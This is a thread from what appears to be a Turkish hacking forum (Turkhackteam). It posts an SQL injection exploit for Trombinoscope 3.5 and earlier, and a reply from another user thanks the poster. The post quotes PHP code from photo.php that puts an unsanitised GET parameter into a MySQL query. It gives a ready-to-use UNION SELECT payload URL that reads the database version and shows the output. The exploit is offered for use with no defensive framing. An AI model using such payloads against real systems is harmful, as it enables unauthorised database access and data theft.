İPUCU

Bug Researchers Yeni bulunan açıklar.

Seçenekler

Trombinoscope <= 3.5 SQL Injection Vulnerability

06-05-2012 20:44
#1
arincahm - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
09/2010
Mesajlar:
52
Teşekkür (Etti):
3
Teşekkür (Aldı):
2
Konular:
13
<~><~><~><~><~><~><~><~><~><~><~><~><~><~><~><~><~ ><~><~><~><~>
Exploit Title: Trombinoscope <= 3.5 SQL Injection Vulnerability
Date: 03 Mayıs 2012
Author: THT
Home: Turkhackteam.net
Program:
http://ftp1.toocharger.com/sc2MP3p/t...scope_4116.zip
<~><~><~><~><~><~><~><~><~><~><~><~><~><~><~><~><~ ><~><~><~><~>

Bugs <photo.php>:

[...]
25 <?php
26 $id = $_GET["id"];
27
28 $query_seul = "SELECT `pseudo`, `sexe`, `img` FROM `trombino` WHERE idx = $id";
29 $seul = mysql_query($query_seul) or die(mysql_error());
30 $row_seul = mysql_fetch_assoc($seul);
31
32 ?>
[...]

Exploit: http://localhost/[script]/photo.php?id=-9999/**/union/**/select/**/1,2,version()--
Sonuç : 5.0.51b-community-nt-log
Kullanıcı İmzası
NE MUTLU TÜRKÜM DİYENE

19-06-2013 21:13
#2
byeren100 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
07/2012
Nereden:
İstanbul
Mesajlar:
1.632
Teşekkür (Etti):
296
Teşekkür (Aldı):
137
Konular:
96
teşekkür ederim kardeşim bunu aramıştım ama nedense bulamadım tesadüf burda buldum

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı